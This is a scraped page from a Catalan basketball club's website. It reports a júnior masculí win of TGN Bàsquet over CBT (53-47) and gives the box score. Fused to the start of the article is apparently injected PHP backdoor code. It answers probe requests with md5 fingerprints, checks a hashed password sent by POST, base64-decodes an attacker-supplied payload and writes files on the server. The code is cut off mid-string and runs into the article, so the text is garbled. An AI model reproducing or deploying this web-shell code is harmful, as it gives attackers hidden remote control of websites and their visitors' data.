function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Un gran final permet el júnior masculí superar el CBT (53-47) - Tgn Bàsquet Club -

Un gran final permet el júnior masculí superar el CBT (53-47)

Updated: novembre 17, 2014

El júnior masculí del TGN Bàsquet va vèncer el CBT en un partit molt igualat. L’equip que entrena Jordi Crespo va fer una bona posada en escena i, tot i les errades en la finalització de les seves accions, feia un joc vistós. Així, i amb 21-10 al resultat, les coses van canviar. Dues faltes i una tècnica assenyalades al local Da Rocha en menys d’un minut van descentrar l’equip lila que va encaixar un parcial de 2-11 i que deixava el resultat igualat al descans (23-21). El tercer quart va ser de màxima igualtat i la victòria va perillar en el quart període quan el CBT es va avançar per primera vegada (40-45, 35′). La solidesa i l’ambició del TGN Bàsquet, però, li van permetre fer un parcial de 13-2 en els últims 5 minuts de partit i guanyar el matx.

TGN BÀSQUET   53

CBT   47

TGN BÀSQUET A: Granell (8), Navarro (4), Guart, Cano (5) i Da Rocha (8) -cinc inicial- Gutiérrez (10), Guirao (6), Martín, Rofes (10)

i Renard (2). Triples 4: 2 Da Rocha i 1 Gutiérrez i Rofes. 11/28 tirs lliures. 18 Faltes. Eliminat Da Rocha min 38.

CBT: Llorca (6), Rodríguez (4), Juan (4), Ramírez (3) i Hidalgo -cinc inicial- Gibert (6), Avila (1), López (5), Piñol (4), Vico, Borrell (10) i

Pujol (4). 5/13 tirs lliures. 23 Faltes. Eliminat Rodríguez min 32.

Parcials: 12-8. 11-13 (23-21), 14-15 i 16-11.

Àrbitres: Rivas A.